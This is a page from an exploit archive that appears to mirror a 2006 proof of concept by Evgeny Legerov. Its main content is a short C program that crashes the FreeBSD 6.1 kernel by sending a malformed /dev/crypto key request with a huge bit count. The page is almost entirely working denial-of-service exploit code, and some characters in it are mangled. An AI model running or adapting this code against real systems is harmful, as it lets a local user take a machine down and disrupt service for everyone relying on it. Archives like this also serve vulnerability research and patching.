FreeBSD 6.1 (/dev/crypto) Local Kernel Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FreeBSD 6.1 (/dev/crypto) Local Kernel Denial of Service Exploit
# Published : 2006-10-24
# Author : Evgeny Legerov
# Previous Title : MS Internet Explorer (ADODB Execute) Denial of Service PoC
# Next Title : QK SMTP <= 3.01 (RCPT TO) Remote Denial of Service Exploit

// Evgeny Legerov (elegerov.blogspot.com)

#include unistd.h
#include sys/types.h
#include stdio.h
#include fcntl.h
#include crypto/cryptodev.h

int main()
{
        int fd2, fd;
        struct crypt_kop kop;

        printf("FreeBSD 6.1 /dev/crypto local kernel DoSn");

        fd2 = open("/dev/crypto", O_RDWR, 0);
        if (fd2 == -1){
                perror("open");
                exit(-1);
        }

        if (ioctl(fd2, CRIOGET, &fd) == -1) {
                perror("ioctl");
                exit(-1);
        }

        kop.crk_op = CRK_MOD_EXP;
        kop.crk_iparams = 3;
        kop.crk_oparams = 1;
        kop.crk_param[0].crp_nbits = 0x70000000;

        ioctl(fd, CIOCKEY, &kop);

        printf("exploit failedn");

        return 0;
}

// www.Syue.com [2006-10-24]